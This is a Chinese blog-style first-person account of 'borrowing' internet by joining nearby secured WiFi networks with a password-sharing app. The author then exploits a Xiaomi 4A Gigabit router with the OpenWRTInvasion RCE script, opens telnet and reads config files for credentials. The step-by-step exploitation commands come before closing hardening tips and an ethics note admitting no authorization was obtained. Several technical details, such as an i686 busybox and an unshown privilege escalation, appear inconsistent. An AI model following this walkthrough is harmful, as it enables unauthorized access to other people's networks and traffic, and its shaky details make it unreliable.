朋友家信号差,我用手机和Python脚本‘借’了个网:记一次小米路由器4A千兆版的WIFI渗透与提权实战
从访客到管理员:一次小米路由器4A千兆版的趣味网络探索
朋友新搬了家,邀请我去做客。刚进门就发现手机信号只有可怜的一格,刷个朋友圈都要转半天。朋友不好意思地笑笑:"这小区信号一直不好,要不你连我家WiFi吧?"说着就要去翻路由器背面贴的密码。我摆摆手:"别急,让我试试看能不能自己'借'个网。"接下来的两个小时,上演了一场从普通访客到路由器管理员的奇妙旅程。
1. 寻找可用网络:从万能钥匙到信号分析
掏出手机打开WiFi列表,周围密密麻麻出现了十几个热点。其中几个信号强度不错,但都加了密码。这时候我想起了那个老牌工具——WiFi万能钥匙。
提示:公共场合使用此类工具可能存在法律风险,建议仅在授权环境下测试
安装好APP后,发现它能自动识别部分共享过的热点密码。经过几次尝试,成功连接上了三个信号较强的网络。接下来需要筛选出最适合操作的目标:
- 信号强度:选择RSSI值在-60dBm以内的热点
- 网络带宽:用Speedtest测试下载速度,排除百兆以下网络
- 设备活跃度:通过ARP扫描确认当前在线设备数量,避免选择用户过多的网络
经过筛选,最终锁定了一个名为"Xiaomi_4A_5G"的热点,测速显示下载能达到120Mbps,上传50Mbps,完全够用。
2. 探索路由器管理界面:从外到内的第一步
连上WiFi后,第一步是找出路由器的管理地址。在手机终端输入:
ip route show | grep default结果显示默认网关是192.168.31.1。浏览器访问这个地址,果然跳转到了小米路由器的登录页面。
尝试了几个常见默认密码组合(admin/admin、root/password等)都失败了。这时候我注意到路由器型号是小米4A千兆版(R4A),系统版本为2.28.62。这个信息很关键,因为特定型号和固件版本往往存在已知漏洞。
3. 漏洞利用的艺术:OpenWRTInvasion实战
搜索"小米路由器4A千兆版漏洞",很快发现了一个名为OpenWRTInvasion的开源项目。这个工具专门针对多个小米路由器型号的远程命令执行漏洞。
在笔记本电脑上配置好环境:
git clone https://github.com/acecilia/OpenWRTInvasion.git cd OpenWRTInvasion pip3 install -r requirements.txt运行漏洞利用脚本时遇到了第一个坑:
python3 remote_command_execution_vulnerability.py --router_ip 192.168.31.1虽然脚本显示执行成功,但telnet服务并没有如预期那样开启。查看脚本日志发现是busybox下载失败导致的。解决方案是手动下载busybox并搭建本地HTTP服务:
wget https://www.busybox.net/downloads/binaries/1.30.0-i686/busybox python3 -m http.server 8080然后修改脚本配置,指向本地下载地址重新运行,这次成功开启了telnet服务。
4. 提权与信息收集:从访客到管理员
通过telnet连接路由器后,获得了有限的shell权限。接下来需要进一步提权:
telnet 192.168.31.1登录后执行以下命令获取WiFi配置信息:
cat /etc/config/wireless输出结果中包含了SSID和加密后的密码。为了获取明文密码,还需要访问另一个关键文件:
cat /etc/config/network | grep password至此,不仅获得了WiFi密码,还拥有了路由器的完整控制权。可以做的事情包括但不限于:
- 查看所有连接设备
- 修改DNS设置
- 设置端口转发
- 监控网络流量
5. 安全防护建议:从攻击者视角看防御
完成这次探索后,我不禁思考如何保护自己的路由器安全。以下是一些实用建议:
固件更新策略
| 项目 | 建议频率 | 注意事项 |
|---|---|---|
| 安全更新 | 立即安装 | 关注厂商安全公告 |
| 功能更新 | 评估后安装 | 新版本可能引入新问题 |
| 第三方固件 | 谨慎选择 | 只从可信源获取 |
密码管理最佳实践
- 使用WPA3加密而非WPA2
- 设置12位以上复杂密码,包含大小写字母、数字和特殊符号
- 定期更换密码,特别是访客网络
- 禁用WPS功能(容易受到暴力破解)
6. 技术之外的思考:道德与法律的边界
这次"借网"经历虽然技术上有趣,但也引发了一些思考。在朋友家做这种测试前,其实应该先获得明确授权。网络安全是一把双刃剑,技术本身没有善恶,关键在于使用者的意图和方式。
我最终向朋友坦白了这个过程,并帮他把路由器升级到了最新固件,修改了更强的密码,关闭了不必要的服务。朋友既惊讶又后怕,表示以后会更注意网络安全。
